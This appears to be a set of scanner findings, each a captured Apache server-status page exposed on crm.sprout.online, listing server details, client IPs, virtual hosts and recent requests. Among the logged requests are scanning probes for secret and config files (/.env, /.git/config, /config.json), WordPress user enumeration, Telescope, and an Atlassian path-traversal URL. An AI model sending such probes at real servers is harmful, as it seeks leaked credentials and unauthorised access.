HTTP/1.1 0-01059290/1/1_ 0.059300.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15200.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16000.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745310.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934500.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825500.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322500.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922500.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05822620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058222170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257800.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742310.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19366110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613380.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03280.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04190.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.2222110.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2611610.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34000.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33000.00.010.01 168.143.243.26http/1.1trmm.us:443GET /_all_dbs HTTP/1.1 3-01059500/3/3_ 0.33000.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 3-01059500/2/2_ 0.33000.00.070.07 168.143.243.26http/1.1trmm.us:443GET /.env HTTP/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34000.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34000.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18080.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20000.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab9155671552046
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:07 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 46 seconds Server load: 1.12 0.80 0.33 Total accesses: 469 - Total Traffic: 7.3 MB CPU Usage: u4.43 s.51 cu0 cs0 - .491% CPU load .466 requests/sec - 7.4 kB/second - 15.9 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no1yes018010 6106024no0yes018000 7106043no1yes117010 8106065no3yes018030 9107415no0yes018000 Sum1006 1179060 ________________________________________________________________ ________________________________________________________________ ______________W_____________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016890.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516500.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516510.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279310.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059300.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15200.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16000.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745310.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934500.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825500.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322500.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922500.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05822620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058222170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257800.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742310.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19366110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613380.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03280.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04190.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14110.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.2222210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2611710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34000.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18090.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33000.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.26http/1.1trmm.us:443GET /.env HTTP/1.1 3-01059500/1/1_ 0.23180.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34000.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34000.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18080.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20000.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21190
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab915563c9bbe44
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:26 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 42 seconds Server load: 0.33 0.27 0.15 Total accesses: 863037 - Total Traffic: 13.4 GB CPU Usage: u767.82 s184.05 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no1yes018010 19522no0yes018000 2122076no0yes018000 324195no8yes315060 421293no0yes018000 582938no0yes018000 6113967no0yes018000 794980no0yes018000 9107391no0yes018000 11114344no1yes018010 Sum10010 3177080 ________________________________________________________W_____R_ _W______________________________________________________________ ________________..................__________________............ ......__________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.006900.04.3448.55 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-1.0.js HTTP/1.1 0-0113010/317/4621_ 52.0525210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.232180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.006900.02.2846.17 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/inc_stdsms.js?20201222 HTTP/1.1 0-0113010/322/4644_ 52.0623130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.752160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0921230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.016900.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1111220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9811290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1011190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8964160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98100.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.016940.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.001120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0435140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.006960.04.7361.05 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mms.js?20201222 HTTP/1.1 0-0113010/312/4585_ 51.932474480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57190.01.0032.88 168.143.243.15http/1.1 1-095220/208/2791_ 21.769140.01.1838.56 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/208/2823_ 21.769150.01.1132.33 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/200/2775_ 21.57180.02.6233.41 168.143.243.15http/1.1 1-095220/205/2756_ 21.7671650.01.4824.13 23.220.96.165http/1.1crm.sprout.online:443GET / HTTP/1.1 1-095220/213/2821_ 21.61200.01.5828.78 168.143.243.31http/1.1 1-095220/220/2830_ 21.712110.01.6523.57 168.143.243.15http/1.1 1-095220/199/2810_ 21.57100.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.769150.01.4531.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.30http/1.1 1-095220/210/2816_ 21.71220.01.4037.52 168.143.243.15http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57190.01.0030.80 168.143.243.31http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62200.04.2546.81 168.143.243.15http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.26http/1.1 1-095220/204/2834_ 21.766140.05.5436.71 96.7.74.175http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 1-095220/210/2812_ 21.63120.01.2425.84 168.143.243.15http/1.1 2-01220760/394/3123_ 42.98110.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9721220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.996960.05.5535.73 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mms.js?202012231916 HTTP/1.1 2-01220760/380/3028_ 42.896321910.03.0425.00 96.7.74.180http/1.1 2-01220760/385/3058_ 42.981330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.9062750.03.7921.42 96.7.74.180http/1.1 2-01220760/383/3037_ 42.51200.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.6662780.04.1733.73 96.7.74.180http/1.1 2-01220760/369/3021_ 42.906220.07.5843.21 96.7.74.180http/1.1 2-01220760/391/3077_ 42.51200.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9135140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95220.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.972320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.9161160.05.0234.70 96.7.74.180http/1.1 2-01220760/382/2988_ 42.9061150.05.2042.40 96.7.74.180http/1.1 2-01220760/377/3028
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab91556b316d167
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:26 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 42 seconds Server load: 0.33 0.27 0.15 Total accesses: 863023 - Total Traffic: 13.4 GB CPU Usage: u767.75 s184.04 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no1yes018010 19522no0yes018000 2122076no0yes018000 324195no5yes018050 421293no0yes018000 582938no0yes018000 6113967no0yes018000 794980no0yes018000 9107391no0yes018000 11114344no1yes117010 Sum1007 1179070 ________________________________________________________________ ________________________________________________________________ ________________..................__________________............ ......___W______________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.006800.04.3448.55 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-1.0.js HTTP/1.1 0-0113010/317/4621_ 52.0525210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.231180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.006800.02.2846.17 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/inc_stdsms.js?20201222 HTTP/1.1 0-0113010/322/4644_ 52.0622130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.751160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0911230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.016800.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1101220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9801290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1011190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8963160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98000.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.016840.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.000120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0434140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.006860.04.7361.05 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mms.js?20201222 HTTP/1.1 0-0113010/312/4585_ 51.932374480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57190.01.0032.88 168.143.243.15http/1.1 1-095220/208/2791_ 21.768140.01.1838.56 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/208/2823_ 21.769150.01.1132.33 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/200/2775_ 21.57180.02.6233.41 168.143.243.15http/1.1 1-095220/205/2756_ 21.7671650.01.4824.13 23.220.96.165http/1.1crm.sprout.online:443GET / HTTP/1.1 1-095220/213/2821_ 21.61100.01.5828.78 168.143.243.31http/1.1 1-095220/220/2830_ 21.711110.01.6523.57 168.143.243.15http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.768150.01.4531.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/203/2806_ 21.7510160.04.0043.00 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-095220/210/2816_ 21.71120.01.4037.52 168.143.243.15http/1.1 1-095220/199/2793_ 21.7513110.08.4739.67 96.7.74.175http/1.1crm.textripple.com:443GET / HTTP/1.1 1-095220/201/2796_ 21.57190.01.0030.80 168.143.243.31http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62100.04.2546.81 168.143.243.15http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.26http/1.1 1-095220/204/2834_ 21.765140.05.5436.71 96.7.74.175http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 1-095220/210/2812_ 21.63120.01.2425.84 168.143.243.15http/1.1 2-01220760/394/3123_ 42.98110.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9711220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.996860.05.5535.73 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mms.js?202012231916 HTTP/1.1 2-01220760/380/3028_ 42.896321910.03.0425.00 96.7.74.180http/1.1 2-01220760/385/3058_ 42.981330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.9061750.03.7921.42 96.7.74.180http/1.1 2-01220760/383/3037_ 42.51100.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.6661780.04.1733.73 96.7.74.180http/1.1 2-01220760/369/3021_ 42.906120.07.5843.21 96.7.74.180http/1.1 2-01220760/391/3077_ 42.51100.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9134140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95120.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.971320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.9161160.05.0234.70 96.7.74.180http/1.1 2-01220760/382/2988_ 42.9061150.05.2042.40 96.7.74.180http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab915561e6af682
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:22 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 23 seconds Server load: 0.26 0.21 0.23 Total accesses: 8186249 - Total Traffic: 207.0 GB CPU Usage: u1337.44 s208.71 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 14 requests currently being processed, 184 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no8yes117033 123840no5yes315011 286508no4yes216002 3109764no1yes117010 4116801no3yes216011 533086no3yes117011 621767no12yes315055 7125209no2yes018002 8115169no1yes018010 943856no1yes018001 10129613no7yes117006 Sum11047 1418401322 __________W________R______R________W_R______R_________W_________ ______________W___W______________W____________R_W___________W___ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/210/40346_ 17.91000.03.69868.70 96.7.74.175http/1.1crm.sprout.online:443GET /telescope/requests HTTP/1.1 0-0987300/247/40341_ 17.91000.03.87867.78 96.7.74.175http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0987300/259/40555_ 17.90000.02.13988.51 96.7.74.198http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0987300/224/40520_ 17.92000.01.22854.96 96.7.74.175http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0987300/226/40325_ 17.91000.01.14924.77 96.7.74.175http/1.1crm.sprout.online:443GET /s/0373e2236313e26333e23323/_/;/META-INF/maven/com.atlassia 0-0987300/245/40607_ 17.90000.04.53963.21 96.7.74.198http/1.1crm.textripple.com:443GET /mods/.DS_Store HTTP/1.1 0-0987300/245/40596_ 17.90030.04.03887.13 96.7.74.198http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0987300/249/40502_ 17.91000.01.43781.01 96.7.74.175http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0987300/239/40606_ 17.91000.03.94985.86 96.7.74.198http/1.1crm.textripple.com:443GET /mods/.DS_Store HTTP/1.1 0-0987300/222/40495_ 17.90000.01.25830.92 96.7.74.198http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0987300/243/40326W 17.111600.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/220/40297_ 17.90000.01.11835.96 96.7.74.175http/1.1crm.textripple.com:443GET /lib/.DS_Store HTTP/1.1 0-0987300/216/40504_ 17.90010.01.55867.49 96.7.74.175http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0987300/238/40374_ 17.90000.01.45907.11 96.7.74.198http/1.1crm.textripple.com:443GET /scss/.DS_Store HTTP/1.1 0-0987300/228/40490_ 17.90000.01.16854.63 96.7.74.175http/1.1crm.textripple.com:443GET /mobile/.DS_Store HTTP/1.1 0-0987300/227/40499_ 17.91000.03.95940.81 96.7.74.198http/1.1crm.textripple.com:443GET /tmp/.DS_Store HTTP/1.1 0-0987300/233/40612_ 17.90000.04.05843.94 96.7.74.175http/1.1crm.textripple.com:443GET /mobile/.DS_Store HTTP/1.1 0-0987300/213/40450_ 17.91000.04.02869.37 96.7.74.175http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 1-0238400/573/38292_ 101.89100.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079R 101.612190.07.84873.27 174.240.149.27http/1.1 1-0238400/556/38211_ 101.85100.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.831120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54120.011.57932.12 96.7.74.175http/1.1 1-0238400/558/38022_ 101.85210.07.38887.80 96.7.74.198http/1.1 1-0238400/561/38116_ 101.58100.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.621850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55214710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.532280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.502120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84100.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.812140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46210.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85200.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.991210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 